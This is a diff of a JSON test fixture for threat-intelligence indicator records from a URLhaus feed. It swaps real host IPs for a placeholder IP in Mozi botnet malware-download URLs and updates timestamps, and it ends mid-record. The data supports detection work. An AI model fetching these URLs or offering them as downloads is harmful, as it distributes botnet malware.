@@ -470,18 +470,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.224.68.97:58245/Mozi.m", + "original": "http://89.160.20.156:58245/Mozi.m", "scheme": "http", "port": 58245, - "domain": "42.224.68.97", - "full": "http://42.224.68.97:58245/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:58245/Mozi.m" }, - "ip": "42.224.68.97" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692289635Z", - "original": "{\"id\":\"961539\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961539/\",\"url\":\"http://42.224.68.97:58245/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.224.68.97\",\"date_added\":\"2021-01-14 21:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024486700Z", + "original": "{\"id\":\"961539\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961539/\",\"url\":\"http://89.160.20.156:58245/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -519,18 +519,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://222.81.144.207:37198/Mozi.m", + "original": "http://89.160.20.156:37198/Mozi.m", "scheme": "http", "port": 37198, - "domain": "222.81.144.207", - "full": "http://222.81.144.207:37198/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:37198/Mozi.m" }, - "ip": "222.81.144.207" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692293292Z", - "original": "{\"id\":\"961538\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961538/\",\"url\":\"http://222.81.144.207:37198/Mozi.m\",\"url_status\":\"online\",\"host\":\"222.81.144.207\",\"date_added\":\"2021-01-14 21:06:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024493900Z", + "original": "{\"id\":\"961538\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961538/\",\"url\":\"http://89.160.20.156:37198/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:06:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -568,18 +568,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.127.185.137:33524/Mozi.m", + "original": "http://89.160.20.156:33524/Mozi.m", "scheme": "http", "port": 33524, - "domain": "182.127.185.137", - "full": "http://182.127.185.137:33524/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:33524/Mozi.m" }, - "ip": "182.127.185.137" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692296869Z", - "original": "{\"id\":\"961537\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961537/\",\"url\":\"http://182.127.185.137:33524/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.127.185.137\",\"date_added\":\"2021-01-14 21:06:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024501300Z", + "original": "{\"id\":\"961537\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961537/\",\"url\":\"http://89.160.20.156:33524/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:06:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -617,18 +617,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://39.84.175.185:48261/Mozi.a", + "original": "http://89.160.20.156:48261/Mozi.a", "scheme": "http", "port": 48261, - "domain": "39.84.175.185", - "full": "http://39.84.175.185:48261/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:48261/Mozi.a" }, - "ip": "39.84.175.185" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692301838Z", - "original": "{\"id\":\"961531\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961531/\",\"url\":\"http://39.84.175.185:48261/Mozi.a\",\"url_status\":\"online\",\"host\":\"39.84.175.185\",\"date_added\":\"2021-01-14 21:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024508500Z", + "original": "{\"id\":\"961531\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961531/\",\"url\":\"http://89.160.20.156:48261/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -666,18 +666,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://27.41.11.238:34478/Mozi.m", + "original": "http://89.160.20.156:34478/Mozi.m", "scheme": "http", "port": 34478, - "domain": "27.41.11.238", - "full": "http://27.41.11.238:34478/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:34478/Mozi.m" }, - "ip": "27.41.11.238" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692305305Z", - "original": "{\"id\":\"961532\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961532/\",\"url\":\"http://27.41.11.238:34478/Mozi.m\",\"url_status\":\"online\",\"host\":\"27.41.11.238\",\"date_added\":\"2021-01-14 21:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024516100Z", + "original": "{\"id\":\"961532\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961532/\",\"url\":\"http://89.160.20.156:34478/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -715,18 +715,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://182.127.133.68:35703/Mozi.a", + "original": "http://89.160.20.156:35703/Mozi.a", "scheme": "http", "port": 35703, - "domain": "182.127.133.68", - "full": "http://182.127.133.68:35703/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:35703/Mozi.a" }, - "ip": "182.127.133.68" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692308661Z", - "original": "{\"id\":\"961533\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961533/\",\"url\":\"http://182.127.133.68:35703/Mozi.a\",\"url_status\":\"online\",\"host\":\"182.127.133.68\",\"date_added\":\"2021-01-14 21:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024523500Z", + "original": "{\"id\":\"961533\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961533/\",\"url\":\"http://89.160.20.156:35703/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -764,18 +764,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://27.46.44.102:48666/Mozi.m", + "original": "http://89.160.20.156:48666/Mozi.m", "scheme": "http", "port": 48666, - "domain": "27.46.44.102", - "full": "http://27.46.44.102:48666/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:48666/Mozi.m" }, - "ip": "27.46.44.102" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692311857Z", - "original": "{\"id\":\"961534\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961534/\",\"url\":\"http://27.46.44.102:48666/Mozi.m\",\"url_status\":\"online\",\"host\":\"27.46.44.102\",\"date_added\":\"2021-01-14 21:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024548900Z", + "original": "{\"id\":\"961534\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961534/\",\"url\":\"http://89.160.20.156:48666/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -813,18 +813,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://39.70.88.65:53923/Mozi.m", + "original": "http://89.160.20.156:53923/Mozi.m", "scheme": "http", "port": 53923, - "domain": "39.70.88.65", - "full": "http://39.70.88.65:53923/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:53923/Mozi.m" }, - "ip": "39.70.88.65" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692315454Z", - "original": "{\"id\":\"961535\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961535/\",\"url\":\"http://39.70.88.65:53923/Mozi.m\",\"url_status\":\"online\",\"host\":\"39.70.88.65\",\"date_added\":\"2021-01-14 21:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024556600Z", + "original": "{\"id\":\"961535\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961535/\",\"url\":\"http://89.160.20.156:53923/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -862,18 +862,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.224.136.237:52794/Mozi.m", + "original": "http://89.160.20.156:52794/Mozi.m", "scheme": "http", "port": 52794, - "domain": "42.224.136.237", - "full": "http://42.224.136.237:52794/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:52794/Mozi.m" }, - "ip": "42.224.136.237" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692318870Z", - "original": "{\"id\":\"961536\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961536/\",\"url\":\"http://42.224.136.237:52794/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.224.136.237\",\"date_added\":\"2021-01-14 21:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024563700Z", + "original": "{\"id\":\"961536\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961536/\",\"url\":\"http://89.160.20.156:52794/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -911,18 +911,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://117.208.135.63:49312/Mozi.a", + "original": "http://89.160.20.156:49312/Mozi.a", "scheme": "http", "port": 49312, - "domain": "117.208.135.63", - "full": "http://117.208.135.63:49312/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:49312/Mozi.a" }, - "ip": "117.208.135.63" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692541770Z", - "original": "{\"id\":\"961530\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961530/\",\"url\":\"http://117.208.135.63:49312/Mozi.a\",\"url_status\":\"offline\",\"host\":\"117.208.135.63\",\"date_added\":\"2021-01-14 21:05:34 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"false\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024570900Z", + "original": "{\"id\":\"961530\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961530/\",\"url\":\"http://89.160.20.156:49312/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:05:34 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"false\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -960,18 +960,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://125.47.66.60:38961/Mozi.m", + "original": "http://89.160.20.156:38961/Mozi.m", "scheme": "http", "port": 38961, - "domain": "125.47.66.60", - "full": "http://125.47.66.60:38961/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:38961/Mozi.m" }, - "ip": "125.47.66.60" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692552110Z", - "original": "{\"id\":\"961525\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961525/\",\"url\":\"http://125.47.66.60:38961/Mozi.m\",\"url_status\":\"online\",\"host\":\"125.47.66.60\",\"date_added\":\"2021-01-14 21:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024577900Z", + "original": "{\"id\":\"961525\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961525/\",\"url\":\"http://89.160.20.156:38961/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -1009,18 +1009,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://182.117.95.148:50420/Mozi.a", + "original": "http://89.160.20.156:50420/Mozi.a", "scheme": "http", "port": 50420, - "domain": "182.117.95.148", - "full": "http://182.117.95.148:50420/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:50420/Mozi.a" }, - "ip": "182.117.95.148" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692557149Z", - "original": "{\"id\":\"961526\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961526/\",\"url\":\"http://182.117.95.148:50420/Mozi.a\",\"url_status\":\"online\",\"host\":\"182.117.95.148\",\"date_added\":\"2021-01-14 21:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024585Z", + "original": "{\"id\":\"961526\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961526/\",\"url\":\"http://89.160.20.156:50420/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -1058,18 +1058,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.202.71.48:55007/Mozi.m", + "original": "http://89.160.20.156:55007/Mozi.m", "scheme": "http", "port": 55007, - "domain": "117.202.71.48", - "full": "http://117.202.71.48:55007/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:55007/Mozi.m" }, - "ip": "117.202.71.48" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692560806Z", - "original": "{\"id\":\"961527\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961527/\",\"url\":\"http://117.202.71.48:55007/Mozi.m\",\"url_status\":\"online\",\"host\":\"117.202.71.48\",\"date_added\":\"2021-01-14 21:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024592100Z", + "original": "{\"id\":\"961527\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961527/\",\"url\":\"http://89.160.20.156:55007/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -1107,18 +1107,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://125.99.132.118:51143/Mozi.m", + "original": "http://89.160.20.156:51143/Mozi.m", "scheme": "http", "port": 51143, - "domain": "125.99.132.118", - "full": "http://125.99.132.118:51143/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:51143/Mozi.m" }, - "ip": "125.99.132.118" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692564293Z", - "original": "{\"id\":\"961528\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961528/\",\"url\":\"http://125.99.132.118:51143/Mozi.m\",\"url_status\":\"online\",\"host\":\"125.99.132.118\",\"date_added\":\"2021-01-14 21:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024599400Z", + "original": "{\"id\":\"961528\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961528/\",\"url\":\"http://89.160.20.156:51143/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -1156,18 +1156,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.114.123.69:41003/Mozi.m", + "original": "http://89.160.20.156:41003/Mozi.m", "scheme": "http", "port": 41003, - "domain": "182.114.123.69", - "full": "http://182.114.123.69:41003/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:41003/Mozi.m" }, - "ip": "182.114.123.69" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692567959Z", - "original": "{\"id\":\"961529\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961529/\",\"url\":\"http://182.114.123.69:41003/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.114.123.69\",\"date_added\":\"2021-01-14 21:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024606700Z", + "original": "{\"id\":\"961529\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961529/\",\"url\":\"http://89.160.20.156:41003/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -1204,18 +1204,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://116.19.127.37:35739/Mozi.m", + "original": "http://89.160.20.156:35739/Mozi.m", "scheme": "http", "port": 35739, - "domain": "116.19.127.37", - "full": "http://116.19.127.37:35739/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:35739/Mozi.m" }, - "ip": "116.19.127.37" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692571636Z", - "original": "{\"id\":\"961524\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961524/\",\"url\":\"http://116.19.127.37:35739/Mozi.m\",\"url_status\":\"offline\",\"host\":\"116.19.127.37\",\"date_added\":\"2021-01-14 21:04:38 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024613900Z", + "original": "{\"id\":\"961524\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961524/\",\"url\":\"http://89.160.20.156:35739/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:38 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -1252,18 +1252,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.239.253.55:45653/Mozi.m", + "original": "http://89.160.20.156:45653/Mozi.m", "scheme": "http", "port": 45653, - "domain": "42.239.253.55", - "full": "http://42.239.253.55:45653/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:45653/Mozi.m" }, - "ip": "42.239.253.55" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692574692Z", - "original": "{\"id\":\"961523\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961523/\",\"url\":\"http://42.239.253.55:45653/Mozi.m\",\"url_status\":\"offline\",\"host\":\"42.239.253.55\",\"date_added\":\"2021-01-14 21:04:36 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024621Z", + "original": "{\"id\":\"961523\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961523/\",\"url\":\"http://89.160.20.156:45653/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:36 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -1300,18 +1300,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://103.217.121.228:41349/Mozi.m", + "original": "http://89.160.20.156:41349/Mozi.m", "scheme": "http", "port": 41349, - "domain": "103.217.121.228", - "full": "http://103.217.121.228:41349/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:41349/Mozi.m" }, - "ip": "103.217.121.228" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692577798Z", - "original": "{\"id\":\"961520\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961520/\",\"url\":\"http://103.217.121.228:41349/Mozi.m\",\"url_status\":\"offline\",\"host\":\"103.217.121.228\",\"date_added\":\"2021-01-14 21:04:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024628Z", + "original": "{\"id\":\"961520\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961520/\",\"url\":\"http://89.160.20.156:41349/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -1348,18 +1348,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://111.92.81.255:48586/Mozi.m", + "original": "http://89.160.20.156:48586/Mozi.m", "scheme": "http", "port": 48586, - "domain": "111.92.81.255", - "full": "http://111.92.81.255:48586/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:48586/Mozi.m" }, - "ip": "111.92.81.255" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692580884Z", - "original": "{\"id\":\"961521\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961521/\",\"url\":\"http://111.92.81.255:48586/Mozi.m\",\"url_status\":\"offline\",\"host\":\"111.92.81.255\",\"date_added\":\"2021-01-14 21:04:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024635100Z", + "original": "{\"id\":\"961521\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961521/\",\"url\":\"http://89.160.20.156:48586/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not 